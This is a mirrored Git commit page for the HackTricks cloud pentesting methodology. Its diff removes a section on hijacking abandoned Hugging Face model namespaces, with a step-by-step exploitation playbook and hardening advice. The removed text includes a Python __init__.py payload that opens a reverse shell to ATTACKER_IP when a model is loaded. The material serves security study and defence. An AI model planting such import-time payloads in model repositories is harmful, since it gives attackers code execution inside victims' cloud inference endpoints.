gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Update pentesting-cloud-methodology.md

Browse Source
This commit is contained in:
SirBroccoli
2025-09-29 23:03:04 +02:00
committed by GitHub
parent 5b5e339f96
commit 89a2ab54ae
1 changed files with 0 additions and 69 deletions
Download Patch File Download Diff File Expand all files Collapse all files

69
src/pentesting-cloud/pentesting-cloud-methodology.md
View File

@@ -420,75 +420,6 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)
A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker.
Key cases on Hugging Face hub:
- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model.
- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content.
Recognition heuristics (HTTP):
```bash
# Author existence
curl -I https://huggingface.co/<Author> # 200 exists, 404 deleted/available
# Legacy model path behavior
curl -I https://huggingface.co/<Author>/<ModelName> # 307 redirect (transfer) | 404 deleted until takeover
```
Exploitation playbook (abstract):
1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs.
2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author.
3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True.
4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attackers code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoints permissions.
Payload on load (example):
```python
# __init__.py or a module imported by model loader
import os, socket, subprocess, threading
def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"]) # demo purposes only
# Gate on an env var if desired
if os.environ.get("INFERENCE_ENDPOINT","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```
Cloud platform impact and examples:
- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code.
{{#ref}}
gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
{{#endref}}
- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoints permissions.
{{#ref}}
azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md
{{#endref}}
Detection and hardening:
- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership.
- Pin to a specific commit in loaders to prevent silent replacement:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
- Clone vetted models to trusted internal registries/artifact stores and reference those in production.
- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered.
## Google
### GCP